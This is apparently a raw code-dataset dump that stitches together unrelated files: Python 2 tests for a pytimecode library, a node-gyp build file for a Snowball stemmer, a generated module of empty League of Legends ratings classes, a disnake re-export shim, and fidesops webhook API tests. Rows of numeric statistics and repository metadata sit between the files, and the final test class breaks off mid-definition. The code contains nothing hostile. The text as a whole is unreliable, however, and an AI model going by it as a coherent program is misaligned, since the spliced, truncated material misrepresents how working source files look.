d = tc * tc2
f = tc * 1763
assert d.make_timecode() == "15:22:25:57"
assert d.frames == 3317437
assert f.make_timecode() == "15:22:25:57"
assert f.frames == 3317437
tc = pytimecode.PyTimeCode('23.98', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('23.98', '00:00:29:23')
d = tc * tc2
f = tc * 719
assert d.make_timecode() == "22:23:20:01"
assert d.frames == 1934401
assert f.make_timecode() == "22:23:20:01"
assert f.frames == 1934401
tc = pytimecode.PyTimeCode('24', '03:36:09:23')
tc = pytimecode.PyTimeCode('23.98', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('23.98', '00:00:29:23')
d = tc * tc2
f = tc * 719
assert d.make_timecode() == "22:23:20:01"
assert d.frames == 1934401
assert f.make_timecode() == "22:23:20:01"
assert f.frames == 1934401
tc = pytimecode.PyTimeCode('ms', '03:36:09:230')
tc2 = pytimecode.PyTimeCode('ms', '01:06:09:230')
d = tc * tc2
f = tc * 719
print tc.frames, tc2.frames, d.frames
assert d.make_timecode() == "12:39:52:900"
assert d.frames == 45592900
assert f.make_timecode() == "22:14:36:370"
assert f.frames == 80076370
tc = pytimecode.PyTimeCode('24', start_timecode=None, frames=12000)
tc2 = pytimecode.PyTimeCode('24', start_timecode=None, frames=485)
d = tc * tc2
f = tc * 719
assert d.make_timecode() == "19:21:40:00"
assert d.frames == 1672800
assert f.make_timecode() == "03:51:40:00"
assert f.frames == 333600
def test_24_hour_limit(self):
tc = pytimecode.PyTimeCode('24', '00:00:00:21')
tc2 = pytimecode.PyTimeCode('24', '23:59:59:23')
assert (tc + tc2).make_timecode() == '00:00:00:20'
assert (tc2 + 159840001).make_timecode() == '02:00:00:00'
tc = pytimecode.PyTimeCode('29.97', '00:00:00:21')
tc2 = pytimecode.PyTimeCode('29.97', '23:59:59:29')
print (tc + tc2).frames
assert (tc + tc2).make_timecode() == '00:00:00:20'
assert (tc2 + 18360001).make_timecode() == '02:00:00:00'
tc = pytimecode.PyTimeCode('29.97', '00:00:00:01', drop_frame=True)
tc2 = pytimecode.PyTimeCode('29.97', '23:59:59:29', drop_frame=True)
tc3 = (tc2+21)
print 'yp1', tc.frames, tc2.frames, tc3.frames, tc.make_timecode()
assert tc3.make_timecode() == '00:00:00:20'
tc = pytimecode.PyTimeCode('29.97', '00:00:00:21', drop_frame=True)
tc2 = pytimecode.PyTimeCode('29.97', '23:59:59:29', drop_frame=True)
tc3 = (tc+tc2)
print 'yp2', tc.frames, tc2.frames, tc3.frames, tc.make_timecode()
assert tc3.make_timecode() == '00:00:00:20'
tc = pytimecode.PyTimeCode('29.97', '04:20:13:21', drop_frame=True)
tc2 = pytimecode.PyTimeCode('29.97', '23:59:59:29', drop_frame=True)
tc3 = (tc+tc2)
print 'yp2', tc.frames, tc2.frames, tc3.frames, tc.make_timecode()
assert tc3.make_timecode() == '04:20:13:20'
tc = pytimecode.PyTimeCode('59.94', '04:20:13:21', drop_frame=True)
tc2 = pytimecode.PyTimeCode('59.94', '23:59:59:59', drop_frame=True)
tc3 = (tc+tc2)
print 'yp2', tc.frames, tc2.frames, tc3.frames, tc.make_timecode()
assert tc3.make_timecode() == '04:20:13:20'
def test_exceptions(self):
e = None
try:
tc = pytimecode.PyTimeCode('24', '01:20:30:303')
except pytimecode.PyTimeCodeError as e:
pass
print type(e), e
assert e.__str__() == 'Timecode string parsing error. 01:20:30:303'
try:
tc = pytimecode.PyTimeCode('23.98', '01:20:30:303')
except pytimecode.PyTimeCodeError as e:
pass
print type(e), e
assert e.__str__() == 'Timecode string parsing error. 01:20:30:303'
try:
tc = pytimecode.PyTimeCode('29.97', '01:20:30:303')
except pytimecode.PyTimeCodeError as e:
pass
print type(e), e
assert e.__str__() == 'Timecode string parsing error. 01:20:30:303'
try:
tc = pytimecode.PyTimeCode('30', '01:20:30:303')
except pytimecode.PyTimeCodeError as e:
pass
print type(e), e
assert e.__str__() == 'Timecode string parsing error. 01:20:30:303'
try:
tc = pytimecode.PyTimeCode('60', '01:20:30:303')
except pytimecode.PyTimeCodeError as e:
pass
print type(e), e
assert e.__str__() == 'Timecode string parsing error. 01:20:30:303'
try:
tc = pytimecode.PyTimeCode('59.94', '01:20:30:303')
except pytimecode.PyTimeCodeError as e:
pass
print type(e), e
assert e.__str__() == 'Timecode string parsing error. 01:20:30:303'
try:
tc = pytimecode.PyTimeCode('ms', '01:20:30:3039')
except pytimecode.PyTimeCodeError as e:
pass
print type(e), e
assert e.__str__() == 'Timecode string parsing error. 01:20:30:3039'
try:
tc = pytimecode.PyTimeCode('60', '01:20:30:30', drop_frame=True)
except pytimecode.PyTimeCodeError as e:
pass
print type(e), e
assert e.__str__() == 'Drop frame with 60fps not supported, only 29.97 & 59.94.'
tc = pytimecode.PyTimeCode('29.97', '00:00:09:23', drop_frame=True)
tc2 = 'bum'
try:
d = tc * tc2
except pytimecode.PyTimeCodeError as e:
pass
assert e.__str__() == "Type <type 'str'> not supported for arithmetic."
tc = pytimecode.PyTimeCode('30', '00:00:09:23')
tc2 = 'bum'
try:
d = tc + tc2
except pytimecode.PyTimeCodeError as e:
pass
assert e.__str__() == "Type <type 'str'> not supported for arithmetic."
tc = pytimecode.PyTimeCode('24', '00:00:09:23')
tc2 = 'bum'
try:
d = tc - tc2
except pytimecode.PyTimeCodeError as e:
pass
assert e.__str__() == "Type <type 'str'> not supported for arithmetic."
tc = pytimecode.PyTimeCode('ms', '00:00:09:237')
tc2 = 'bum'
try:
d = tc / tc2
except pytimecode.PyTimeCodeError as e:
pass
assert e.__str__() == "Type <type 'str'> not supported for arithmetic."
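# Illustrative sketch, not from the original file: the 24-hour wrap exercised
# in test_24_hour_limit above is modular arithmetic over the frame count; the
# helper name is hypothetical, not pytimecode's API.
def _wrap_24h(frames, fps=24):
    frames_per_day = fps * 60 * 60 * 24  # 2073600 at 24 fps
    return frames % frames_per_day

# '23:59:59:23' at 24 fps is frame 2073599; 22 frames later the day wraps:
assert _wrap_24h(2073599 + 22) == 21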
| 41.252788 | 97 | 0.551681 | 3,113 | 22,194 | 3.862191 | 0.060713 | 0.214589 | 0.155535 | 0.029943 | 0.896365 | 0.874324 | 0.845962 | 0.803626 | 0.767113 | 0.713133 | 0 | 0.17872 | 0.294088 | 22,194 | 538 | 98 | 41.252788 | 0.58869 | 0 | 0 | 0.712355 | 0 | 0 | 0.146909 | 0 | 0 | 0 | 0 | 0 | 0.428571 | 0 | null | null | 0.027027 | 0.001931 | null | null | 0.055985 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
ab5dfee530981abe9256b28a7e1a8be9554cf998 | 2,424 | gyp | Python | binding.gyp | rm-hull/node-snowball | 9b3b02067106dbe8a61b590d1d4ce28e8c11165b | ["MIT"] | stars: null | issues: null | forks: 1 (2018-07-02T17:43:12.000Z – 2018-07-02T17:43:12.000Z) |
{
"targets": [
{
"target_name": "snowball",
"include_dirs" : [
"<!(node -e \"require('nan')\")"
],
"sources": [
"src/snowball.cpp",
"src/NativeExtension.cpp",
"src/libstemmer/libstemmer/libstemmer.c",
"src/libstemmer/runtime/api.c",
"src/libstemmer/runtime/utilities.c",
"src/libstemmer/src_c/stem_ISO_8859_1_danish.c",
"src/libstemmer/src_c/stem_ISO_8859_1_dutch.c",
"src/libstemmer/src_c/stem_ISO_8859_1_english.c",
"src/libstemmer/src_c/stem_ISO_8859_1_finnish.c",
"src/libstemmer/src_c/stem_ISO_8859_1_french.c",
"src/libstemmer/src_c/stem_ISO_8859_1_german.c",
"src/libstemmer/src_c/stem_ISO_8859_1_hungarian.c",
"src/libstemmer/src_c/stem_ISO_8859_1_italian.c",
"src/libstemmer/src_c/stem_ISO_8859_1_norwegian.c",
"src/libstemmer/src_c/stem_ISO_8859_1_porter.c",
"src/libstemmer/src_c/stem_ISO_8859_1_portuguese.c",
"src/libstemmer/src_c/stem_ISO_8859_1_spanish.c",
"src/libstemmer/src_c/stem_ISO_8859_1_swedish.c",
"src/libstemmer/src_c/stem_ISO_8859_2_romanian.c",
"src/libstemmer/src_c/stem_KOI8_R_russian.c",
"src/libstemmer/src_c/stem_UTF_8_danish.c",
"src/libstemmer/src_c/stem_UTF_8_dutch.c",
"src/libstemmer/src_c/stem_UTF_8_english.c",
"src/libstemmer/src_c/stem_UTF_8_finnish.c",
"src/libstemmer/src_c/stem_UTF_8_french.c",
"src/libstemmer/src_c/stem_UTF_8_german.c",
"src/libstemmer/src_c/stem_UTF_8_hungarian.c",
"src/libstemmer/src_c/stem_UTF_8_italian.c",
"src/libstemmer/src_c/stem_UTF_8_norwegian.c",
"src/libstemmer/src_c/stem_UTF_8_porter.c",
"src/libstemmer/src_c/stem_UTF_8_portuguese.c",
"src/libstemmer/src_c/stem_UTF_8_romanian.c",
"src/libstemmer/src_c/stem_UTF_8_russian.c",
"src/libstemmer/src_c/stem_UTF_8_spanish.c",
"src/libstemmer/src_c/stem_UTF_8_swedish.c",
"src/libstemmer/src_c/stem_UTF_8_turkish.c"
]
}
]
}
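# Illustrative sketch, not part of the record above: gyp's <!(...) syntax
# substitutes the stdout of a shell command, and the nan package prints its
# header directory when required, which is what the "include_dirs" entry
# relies on. A minimal Python model of that expansion (assumes node and nan
# are installed):
#
#     import subprocess
#     include_dir = subprocess.check_output(
#         'node -e "require(\'nan\')"', shell=True, text=True
#     ).strip()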
| 50.5 | 68 | 0.57962 | 325 | 2,424 | 3.892308 | 0.135385 | 0.349407 | 0.365217 | 0.416601 | 0.84664 | 0.84664 | 0.84664 | 0.671146 | 0.360474 | 0 | 0 | 0.051388 | 0.301568 | 2,424 | 48 | 69 | 50.5 | 0.695806 | 0 | 0 | 0 | 0 | 0 | 0.637526 | 0.605773 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
db6b785535c4639632079aca31a74ad3391c5606 | 6,269 | py | Python | loldib/getratings/models/NA/na_azir/na_azir_sup.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | ["Apache-2.0"] | stars: null | issues: null | forks: null |
from getratings.models.ratings import Ratings
class NA_Azir_Sup_Aatrox(Ratings):
pass
class NA_Azir_Sup_Ahri(Ratings):
pass
class NA_Azir_Sup_Akali(Ratings):
pass
class NA_Azir_Sup_Alistar(Ratings):
pass
class NA_Azir_Sup_Amumu(Ratings):
pass
class NA_Azir_Sup_Anivia(Ratings):
pass
class NA_Azir_Sup_Annie(Ratings):
pass
class NA_Azir_Sup_Ashe(Ratings):
pass
class NA_Azir_Sup_AurelionSol(Ratings):
pass
class NA_Azir_Sup_Azir(Ratings):
pass
class NA_Azir_Sup_Bard(Ratings):
pass
class NA_Azir_Sup_Blitzcrank(Ratings):
pass
class NA_Azir_Sup_Brand(Ratings):
pass
class NA_Azir_Sup_Braum(Ratings):
pass
class NA_Azir_Sup_Caitlyn(Ratings):
pass
class NA_Azir_Sup_Camille(Ratings):
pass
class NA_Azir_Sup_Cassiopeia(Ratings):
pass
class NA_Azir_Sup_Chogath(Ratings):
pass
class NA_Azir_Sup_Corki(Ratings):
pass
class NA_Azir_Sup_Darius(Ratings):
pass
class NA_Azir_Sup_Diana(Ratings):
pass
class NA_Azir_Sup_Draven(Ratings):
pass
class NA_Azir_Sup_DrMundo(Ratings):
pass
class NA_Azir_Sup_Ekko(Ratings):
pass
class NA_Azir_Sup_Elise(Ratings):
pass
class NA_Azir_Sup_Evelynn(Ratings):
pass
class NA_Azir_Sup_Ezreal(Ratings):
pass
class NA_Azir_Sup_Fiddlesticks(Ratings):
pass
class NA_Azir_Sup_Fiora(Ratings):
pass
class NA_Azir_Sup_Fizz(Ratings):
pass
class NA_Azir_Sup_Galio(Ratings):
pass
class NA_Azir_Sup_Gangplank(Ratings):
pass
class NA_Azir_Sup_Garen(Ratings):
pass
class NA_Azir_Sup_Gnar(Ratings):
pass
class NA_Azir_Sup_Gragas(Ratings):
pass
class NA_Azir_Sup_Graves(Ratings):
pass
class NA_Azir_Sup_Hecarim(Ratings):
pass
class NA_Azir_Sup_Heimerdinger(Ratings):
pass
class NA_Azir_Sup_Illaoi(Ratings):
pass
class NA_Azir_Sup_Irelia(Ratings):
pass
class NA_Azir_Sup_Ivern(Ratings):
pass
class NA_Azir_Sup_Janna(Ratings):
pass
class NA_Azir_Sup_JarvanIV(Ratings):
pass
class NA_Azir_Sup_Jax(Ratings):
pass
class NA_Azir_Sup_Jayce(Ratings):
pass
class NA_Azir_Sup_Jhin(Ratings):
pass
class NA_Azir_Sup_Jinx(Ratings):
pass
class NA_Azir_Sup_Kalista(Ratings):
pass
class NA_Azir_Sup_Karma(Ratings):
pass
class NA_Azir_Sup_Karthus(Ratings):
pass
class NA_Azir_Sup_Kassadin(Ratings):
pass
class NA_Azir_Sup_Katarina(Ratings):
pass
class NA_Azir_Sup_Kayle(Ratings):
pass
class NA_Azir_Sup_Kayn(Ratings):
pass
class NA_Azir_Sup_Kennen(Ratings):
pass
class NA_Azir_Sup_Khazix(Ratings):
pass
class NA_Azir_Sup_Kindred(Ratings):
pass
class NA_Azir_Sup_Kled(Ratings):
pass
class NA_Azir_Sup_KogMaw(Ratings):
pass
class NA_Azir_Sup_Leblanc(Ratings):
pass
class NA_Azir_Sup_LeeSin(Ratings):
pass
class NA_Azir_Sup_Leona(Ratings):
pass
class NA_Azir_Sup_Lissandra(Ratings):
pass
class NA_Azir_Sup_Lucian(Ratings):
pass
class NA_Azir_Sup_Lulu(Ratings):
pass
class NA_Azir_Sup_Lux(Ratings):
pass
class NA_Azir_Sup_Malphite(Ratings):
pass
class NA_Azir_Sup_Malzahar(Ratings):
pass
class NA_Azir_Sup_Maokai(Ratings):
pass
class NA_Azir_Sup_MasterYi(Ratings):
pass
class NA_Azir_Sup_MissFortune(Ratings):
pass
class NA_Azir_Sup_MonkeyKing(Ratings):
pass
class NA_Azir_Sup_Mordekaiser(Ratings):
pass
class NA_Azir_Sup_Morgana(Ratings):
pass
class NA_Azir_Sup_Nami(Ratings):
pass
class NA_Azir_Sup_Nasus(Ratings):
pass
class NA_Azir_Sup_Nautilus(Ratings):
pass
class NA_Azir_Sup_Nidalee(Ratings):
pass
class NA_Azir_Sup_Nocturne(Ratings):
pass
class NA_Azir_Sup_Nunu(Ratings):
pass
class NA_Azir_Sup_Olaf(Ratings):
pass
class NA_Azir_Sup_Orianna(Ratings):
pass
class NA_Azir_Sup_Ornn(Ratings):
pass
class NA_Azir_Sup_Pantheon(Ratings):
pass
class NA_Azir_Sup_Poppy(Ratings):
pass
class NA_Azir_Sup_Quinn(Ratings):
pass
class NA_Azir_Sup_Rakan(Ratings):
pass
class NA_Azir_Sup_Rammus(Ratings):
pass
class NA_Azir_Sup_RekSai(Ratings):
pass
class NA_Azir_Sup_Renekton(Ratings):
pass
class NA_Azir_Sup_Rengar(Ratings):
pass
class NA_Azir_Sup_Riven(Ratings):
pass
class NA_Azir_Sup_Rumble(Ratings):
pass
class NA_Azir_Sup_Ryze(Ratings):
pass
class NA_Azir_Sup_Sejuani(Ratings):
pass
class NA_Azir_Sup_Shaco(Ratings):
pass
class NA_Azir_Sup_Shen(Ratings):
pass
class NA_Azir_Sup_Shyvana(Ratings):
pass
class NA_Azir_Sup_Singed(Ratings):
pass
class NA_Azir_Sup_Sion(Ratings):
pass
class NA_Azir_Sup_Sivir(Ratings):
pass
class NA_Azir_Sup_Skarner(Ratings):
pass
class NA_Azir_Sup_Sona(Ratings):
pass
class NA_Azir_Sup_Soraka(Ratings):
pass
class NA_Azir_Sup_Swain(Ratings):
pass
class NA_Azir_Sup_Syndra(Ratings):
pass
class NA_Azir_Sup_TahmKench(Ratings):
pass
class NA_Azir_Sup_Taliyah(Ratings):
pass
class NA_Azir_Sup_Talon(Ratings):
pass
class NA_Azir_Sup_Taric(Ratings):
pass
class NA_Azir_Sup_Teemo(Ratings):
pass
class NA_Azir_Sup_Thresh(Ratings):
pass
class NA_Azir_Sup_Tristana(Ratings):
pass
class NA_Azir_Sup_Trundle(Ratings):
pass
class NA_Azir_Sup_Tryndamere(Ratings):
pass
class NA_Azir_Sup_TwistedFate(Ratings):
pass
class NA_Azir_Sup_Twitch(Ratings):
pass
class NA_Azir_Sup_Udyr(Ratings):
pass
class NA_Azir_Sup_Urgot(Ratings):
pass
class NA_Azir_Sup_Varus(Ratings):
pass
class NA_Azir_Sup_Vayne(Ratings):
pass
class NA_Azir_Sup_Veigar(Ratings):
pass
class NA_Azir_Sup_Velkoz(Ratings):
pass
class NA_Azir_Sup_Vi(Ratings):
pass
class NA_Azir_Sup_Viktor(Ratings):
pass
class NA_Azir_Sup_Vladimir(Ratings):
pass
class NA_Azir_Sup_Volibear(Ratings):
pass
class NA_Azir_Sup_Warwick(Ratings):
pass
class NA_Azir_Sup_Xayah(Ratings):
pass
class NA_Azir_Sup_Xerath(Ratings):
pass
class NA_Azir_Sup_XinZhao(Ratings):
pass
class NA_Azir_Sup_Yasuo(Ratings):
pass
class NA_Azir_Sup_Yorick(Ratings):
pass
class NA_Azir_Sup_Zac(Ratings):
pass
class NA_Azir_Sup_Zed(Ratings):
pass
class NA_Azir_Sup_Ziggs(Ratings):
pass
class NA_Azir_Sup_Zilean(Ratings):
pass
class NA_Azir_Sup_Zyra(Ratings):
pass
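# Illustrative sketch, not in the original module: definitions this repetitive
# are typically emitted by a code generator. An equivalent dynamic
# construction over the same Ratings base (champion list truncated here for
# illustration):
_CHAMPIONS = ["Aatrox", "Ahri", "Akali"]
for _champion in _CHAMPIONS:
    _name = "NA_Azir_Sup_" + _champion
    globals()[_name] = type(_name, (Ratings,), {})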
| 15.033573 | 46 | 0.75642 | 972 | 6,269 | 4.452675 | 0.151235 | 0.223198 | 0.350739 | 0.446396 | 0.791359 | 0.791359 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177221 | 6,269 | 416 | 47 | 15.069712 | 0.839085 | 0 | 0 | 0.498195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.498195 | 0.00361 | 0 | 0.501805 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
db6c4d381e9f4547166f0ede186c81f6c565217d | 128 | py | Python | discord/ui/select.py | kuzaku-developers/disnake | 61cc1ad4c2bafd39726a1447c85f7e469e41af10 | ["MIT"] | stars: null | issues: null | forks: null |
from disnake.ui.select import *
from disnake.ui.select import __dict__ as __original_dict__
locals().update(__original_dict__)
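# Illustrative note, not part of the shim above: at module scope locals() is
# the module's own namespace, so the update() genuinely injects every
# attribute of the wrapped module, including underscore-prefixed names that a
# bare star-import skips (inside a function the same call would do nothing).
# The same trick applied to a stdlib module:
#
#     from json import *
#     from json import __dict__ as __original_dict__
#     locals().update(__original_dict__)
#     assert "_default_encoder" in globals()  # private helper now aliased too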
| 25.6 | 59 | 0.828125 | 18 | 128 | 5.111111 | 0.555556 | 0.23913 | 0.282609 | 0.413043 | 0.543478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09375 | 128 | 4 | 60 | 32 | 0.793103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
dbc53aae7bd76504e9ea569c7bf00475fc600cf4 | 34,588 | py | Python | tests/api/v1/endpoints/test_policy_webhook_endpoints.py | eastandwestwind/fidesops | 93e2881c0fdc30075b7cc22024965d18cec0bdea | ["Apache-2.0"] | stars: 41 (2021-11-01T23:53:43.000Z – 2022-03-22T23:07:56.000Z) | issues: 235 (2021-11-01T20:31:55.000Z – 2022-03-31T15:40:58.000Z) | forks: 12 (2021-11-02T00:44:51.000Z – 2022-03-14T16:23:10.000Z) |
import json
from typing import Dict
import pytest
from fidesops.api.v1.scope_registry import (
WEBHOOK_READ,
WEBHOOK_CREATE_OR_UPDATE,
POLICY_READ,
WEBHOOK_DELETE,
)
from fidesops.api.v1.urn_registry import (
V1_URL_PREFIX,
POLICY_WEBHOOKS_PRE,
POLICY_WEBHOOKS_POST,
POLICY_PRE_WEBHOOK_DETAIL,
POLICY_POST_WEBHOOK_DETAIL,
)
from fidesops.models.connectionconfig import ConnectionConfig
from fidesops.models.policy import PolicyPreWebhook, PolicyPostWebhook
from tests.api.v1.endpoints.test_privacy_request_endpoints import stringify_date
def embedded_http_connection_config(connection_config: ConnectionConfig) -> Dict:
"""Helper to reduce clutter - a lot of the tests below assert the entire response body, which includes the
https connection config"""
return {
"name": connection_config.name,
"key": connection_config.key,
"connection_type": "https",
"access": connection_config.access.value,
"created_at": stringify_date(connection_config.created_at),
"updated_at": stringify_date(connection_config.updated_at),
"last_test_timestamp": None,
"last_test_succeeded": None,
}
class TestGetPolicyPreExecutionWebhooks:
@pytest.fixture(scope="function")
def url(self, policy) -> str:
return V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key=policy.key)
def test_get_pre_execution_webhooks_unauthenticated(self, url, api_client):
resp = api_client.get(url)
assert resp.status_code == 401
def test_get_pre_execution_webhooks_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[POLICY_READ])
resp = api_client.get(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(self, db, api_client, generate_auth_header):
url = V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key="my_fake_policy")
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
def test_get_pre_execution_policy_webhooks(
self,
url,
db,
api_client,
generate_auth_header,
policy_pre_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"items": [
{
"direction": "one_way",
"key": "pre_execution_one_way_webhook",
"name": policy_pre_execution_webhooks[0].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
{
"direction": "two_way",
"key": "pre_execution_two_way_webhook",
"name": policy_pre_execution_webhooks[1].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
],
"total": 2,
"page": 1,
"size": 50,
}
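    # Illustrative sketch, not from the original tests: the envelope asserted
    # above ("items"/"total"/"page"/"size", with size defaulting to 50) matches
    # page-number pagination; a hypothetical builder for that shape:
    @staticmethod
    def _page_envelope(items, page=1, size=50):
        start = (page - 1) * size
        return {
            "items": items[start:start + size],
            "total": len(items),
            "page": page,
            "size": size,
        }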
class TestGetPolicyPostExecutionWebhooks:
@pytest.fixture(scope="function")
def url(self, policy) -> str:
return V1_URL_PREFIX + POLICY_WEBHOOKS_POST.format(policy_key=policy.key)
def test_get_post_execution_webhooks_unauthenticated(self, url, api_client):
resp = api_client.get(url)
assert resp.status_code == 401
def test_get_post_execution_webhooks_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[POLICY_READ])
resp = api_client.get(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(self, db, api_client, generate_auth_header):
url = V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key="my_fake_policy")
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
def test_get_post_execution_policy_webhooks(
self,
url,
db,
api_client,
generate_auth_header,
policy_post_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"items": [
{
"direction": "one_way",
"key": "cache_busting_webhook",
"name": policy_post_execution_webhooks[0].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
{
"direction": "one_way",
"key": "cleanup_webhook",
"name": policy_post_execution_webhooks[1].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
],
"total": 2,
"page": 1,
"size": 50,
}
class TestGetPolicyPreExecutionWebhookDetail:
@pytest.fixture(scope="function")
def url(self, policy, policy_pre_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key=policy.key, pre_webhook_key=policy_pre_execution_webhooks[0].key
)
def test_get_pre_execution_webhook_detail_unauthenticated(self, url, api_client):
resp = api_client.get(url)
assert resp.status_code == 401
def test_get_pre_execution_webhook_detail_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[POLICY_READ])
resp = api_client.get(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(
self, db, api_client, generate_auth_header, policy_pre_execution_webhooks
):
url = V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key="my_fake_policy",
pre_webhook_key=policy_pre_execution_webhooks[0].key,
)
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
def test_webhook_not_on_policy(
self,
db,
api_client,
generate_auth_header,
erasure_policy,
policy_pre_execution_webhooks,
):
url = V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key=erasure_policy.key,
pre_webhook_key=policy_pre_execution_webhooks[0].key,
)
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert (
body["detail"]
== "No Pre-Execution Webhook found for key 'pre_execution_one_way_webhook' on Policy 'example_erasure_policy'."
)
def test_get_pre_execution_policy_webhook_detail(
self,
url,
db,
api_client,
generate_auth_header,
policy_pre_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"direction": "one_way",
"key": "pre_execution_one_way_webhook",
"name": policy_pre_execution_webhooks[0].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
}
class TestGetPolicyPostExecutionWebhookDetail:
@pytest.fixture(scope="function")
def url(self, policy, policy_post_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=policy.key,
post_webhook_key=policy_post_execution_webhooks[0].key,
)
def test_get_post_execution_webhook_detail_unauthenticated(self, url, api_client):
resp = api_client.get(url)
assert resp.status_code == 401
def test_get_post_execution_webhook_detail_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[POLICY_READ])
resp = api_client.get(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(
self, db, api_client, generate_auth_header, policy_post_execution_webhooks
):
url = V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key="my_fake_policy",
post_webhook_key=policy_post_execution_webhooks[0].key,
)
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
def test_webhook_not_on_policy(
self,
db,
api_client,
generate_auth_header,
erasure_policy,
policy_post_execution_webhooks,
):
url = V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=erasure_policy.key,
post_webhook_key=policy_post_execution_webhooks[0].key,
)
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert (
body["detail"]
== "No Post-Execution Webhook found for key 'cache_busting_webhook' on Policy 'example_erasure_policy'."
)
    def test_get_post_execution_policy_webhook_detail(
self,
url,
db,
api_client,
generate_auth_header,
policy_post_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"direction": "one_way",
"key": "cache_busting_webhook",
"name": policy_post_execution_webhooks[0].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
}
class TestPutPolicyPreExecutionWebhooks:
@pytest.fixture(scope="function")
def valid_webhook_request(self, https_connection_config) -> Dict:
return {
"connection_config_key": https_connection_config.key,
"direction": "one_way",
"name": "Poke Snowflake Webhook",
"key": "poke_snowflake_webhook",
}
@pytest.fixture(scope="function")
def url(self, policy) -> str:
